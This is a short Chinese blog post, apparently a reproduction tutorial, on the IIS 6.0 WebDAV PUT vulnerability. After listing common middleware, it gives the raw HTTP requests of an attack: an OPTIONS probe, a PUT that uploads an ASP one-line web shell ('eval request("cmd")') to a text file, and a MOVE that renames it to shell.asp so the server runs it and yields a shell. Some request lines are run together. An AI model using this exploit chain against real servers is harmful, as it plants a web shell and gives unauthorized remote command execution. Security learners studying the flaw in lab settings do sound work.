中介軟體漏洞篇 01 PUT漏洞
阿新 • • 發佈:2021-10-18
中介軟體
常見的中介軟體有
- iis
- apache
- tomacat
- Zookeeper
- nginx
- jboss
- Jetty
- Zookeeper
- weblogic
- websphere
- Glassfish
- ......
IIS Server 在 Web 服務擴充套件中開啟了 WebDAV ,配置了可以寫入的許可權,造成任意檔案上傳。
版本:IIS 6.0
2.漏洞復現
用burpsuite 提交OPTIONS 檢視支援的協議,可以將剛剛抓取下來的資料包的提交方式直接改為OPTIONS 提交
可以看到它支援的協議,其中是支援PUT協議的
我們就可以上傳一個文字
1 PUT /test.txtHTTP/1.12 Host:upload.moonteam.com 3 Content-Length:25 4 5 <%evalrequest("cmd")%>
傳送,回顯201
表示插入成功了,因為是不可以直接上傳asp的,所有要把剛剛上傳上去的檔案修改其後綴
使用下面的命令進行修改後綴為asp。
MOVE/test.txtHTTP/1.1 Host:upload.moonteam.com Destination:http://www.xxx.com/shell.asp
這裡要有空格
回顯201表示成功,shell.asp寫入成功,使用工具可以直接getshell